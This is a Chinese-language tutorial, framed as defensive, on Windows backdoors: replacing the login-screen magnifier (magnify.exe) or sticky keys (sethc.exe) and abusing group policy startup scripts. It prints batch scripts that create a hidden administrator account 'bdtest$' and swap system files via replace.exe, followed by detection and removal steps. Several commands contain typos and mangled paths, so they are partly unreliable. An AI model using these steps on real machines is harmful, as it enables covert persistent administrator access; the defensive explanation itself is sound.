黑客教你解析与防范后门程序，教你检查自己电脑没有黑客后门软件 _后门程序

当电脑被黑客入侵后，通常会留下后门程序，方便下一次入侵。下面以一些常见的后门程序创建为例，介绍后门程序的功能与防范措施。
放大镜后门

文章插图

放大镜(magnifty.exe)是Window系统集成的一个小工具，它是为方便视力障碍用户而设计的。在用户登录系统前可以通过快捷键Win+U调用该工具，攻击者用精心构建的magnify.exe同名文件替换放大镜程序，从而达到控制服务器的目的。
通常情况下，攻击者通过构造的magnify .exe程序创建一个管理员账户，然后登录系统。有时会通过其直接调用命令提示符( cmd.exe)或者系统shell (explorer.exe )创建。需要说明的是，这样调用的程序都是system权限，即系统最高权限。不过，为防止管理员在运行放大镜程序时发现破绽，攻击者一般通过该构造程序完成所需的操作后，会运行真正的放大镜程序，以蒙骗管理员。
1.构造批处理脚本

@echoof
Net user bdtest＄ test /add
Net localgroup administrator bdtest /add
%Windir%system32nagnify.exe
exit

将上面的脚本程序保存为magnify.bat，其作用是创建一个密码为test的管理员账户bdtest＄，最后运行改名后的放大镜程序nagnify.exe
2.文件格式转换
因为批处理文件magnify bat的后缀是bat,必须要将其转换为同名的exe文件才可以通过快捷键Win+U调用。攻击者般可以利用WinRar构造一个自动解压的exe压缩文件，当然也可以利用bat2com.、com2exe进行文件格式的转换。
打开命令行，进入bat2com、com2exe工具所在的目录，然后运行命令bat2commagnify.bat将magnify. bat转换成magnify.com,继续运行命令com2exemagnifty com将magnify .com转換成magnify. exe,这样就把批处理文件转换成和放大镜程序同名的程序文件了。
3.放大镜文件替换
下面用构造的magnify exe替换同名的放大镜程序文件。由于windows对系统文件的自我保护，因此不能直接替换，不过Windows提供了一个命令replace.exe,通过它可以替换系统文件。另外，由于系统文件在%Windir%system32llcache中有备份，为了防止文件替换后又重新还原，首先要替换该目录下的magnify.exe文件。假设构造的magnify.exe文件在%Windir%目录下，可以通过一个批处理实现文件的替换。

@echooff
Copy %Windir%system32 d11cache magnify.exe nagnify.exe
Copy %Windir%system32 magnify.exe nagnify.exe
replace.exe %Windir% magnify.exe %Windir%system32 dllcache
replace.exe %Windir%magnify.exe %Windir%system32
exit

在上面的批处理文件中，首先将放大镜程序备份为nagnify.exe，然后用同名的构造程序将其替换。
4.攻击利用
当完成上述操作后，一个放大镜后门就做成了。攻击者通过远程桌面连接服务器，在登录界面窗口按下快捷键Win+U,选择运行其中的"放大镜"，即可在服务器上创建一个管理员用户bdtest并打开放大镜工具，然后攻击者就通过该帐户登录服务器。当然，攻击者在断开登录前会删除所有与该账户相关的信息，以防被管理员发现。
5.防范措施:
进入%Windir%system32l查看magnify.exe的文件图标是否是原来的放大镜程序的图标，如果不是的话，极有可能被植入了放大镜后门。当然，有的时候攻击者也会将其文件图标更改为和原放大镜程序的图标一样。此时可以查看magnify .exe文件的大小和修改时间。如果这两项有一项不符，就需要慎重检查了。可以先运行magnify .exe,然后运行lusrmgr.msc,查看是否有可疑的用户。如果确定服务器被放置了放大镜后门，首先要删除该文件，然后恢复正常的放大镜程序。当然，也可以做得更彻底一些，用一个无关紧要的程序替换放大镜程序。
与放大镜后门类似的还有"粘滞键" 后门，按Shit键五次可以启动粘滞键功能，其利用和防范措施与放大镜后门类似，只是将magnity .exe换成了sethc exe 。
组策略后门相对来说，组策略后门更加隐蔽。向注册表中添加相应键值以实现随系统启动而运行时木马常用的伎俩，也为大家熟知。其实，在组策略中也可以实现该功能，还可以实现在系统关机时进行某些操作。这是通过组策略的" 脚本(启动/关机)"项来实现。具体位置在"计算机配置——Windows设置"项下。因为其极具隐蔽性，常常被攻击者用来做服务器后门。
只要攻击者获得了电脑的控制权，就可以通过这个后门实施对主机的长期控制。它可以通过这个后门运行某些程序或者脚本，比如创建一个管理员用户。